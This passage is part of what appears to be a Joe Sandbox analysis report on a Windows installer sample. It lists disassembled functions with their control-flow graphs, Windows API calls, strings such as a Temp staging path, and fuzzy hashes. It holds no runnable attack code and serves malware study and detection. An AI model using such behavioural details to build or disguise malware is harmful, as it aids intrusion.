                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                            • String ID: Completed
                                                                                                                                                                            • API String ID: 1495540970-3087654605
                                                                                                                                                                            • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                            • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                                                                                                                                            Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033e8 MulDiv wsprintfW call 405569 693->695 694->692 694->695 702 4033ed 695->702 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 702->692 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                                                                            • String ID: ... %d%%$G8@
                                                                                                                                                                            • API String ID: 551687249-649311722
                                                                                                                                                                            • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                                                                                                                                            Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 714 40689e-4068d1 wsprintfW LoadLibraryExW 711->714 712->711 713 406897-406899 712->713 713->714
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                            • wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                                                                                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                                                                                                                                            Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405A8F
                                                                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AAE
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3449924974-823278215
                                                                                                                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                                                                                                                                            Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 721 406026-406032 722 406033-406067 GetTickCount GetTempFileNameW 721->722 723 406076-406078 722->723 724 406069-40606b 722->724 725 406070-406073 723->725 724->722 726 40606d 724->726 726->725
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00406044
                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                            • API String ID: 1716503409-44229769
                                                                                                                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                                                                                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                              • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner, xrefs: 00401640
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
                                                                                                                                                                            • API String ID: 1892508949-2682599531
                                                                                                                                                                            • Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                            • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                                                                                                                                            • Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                                                                                                                                            Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID: : Completed
                                                                                                                                                                            • API String ID: 3356406503-2954849223
                                                                                                                                                                            • Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                            • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                                                                                                                                            • Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                            • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                                                                                                                                            Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                            • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                                                                                                                                            • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                                                                                                                                            Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                            • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                                                                                                                                            • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                            • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                            Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
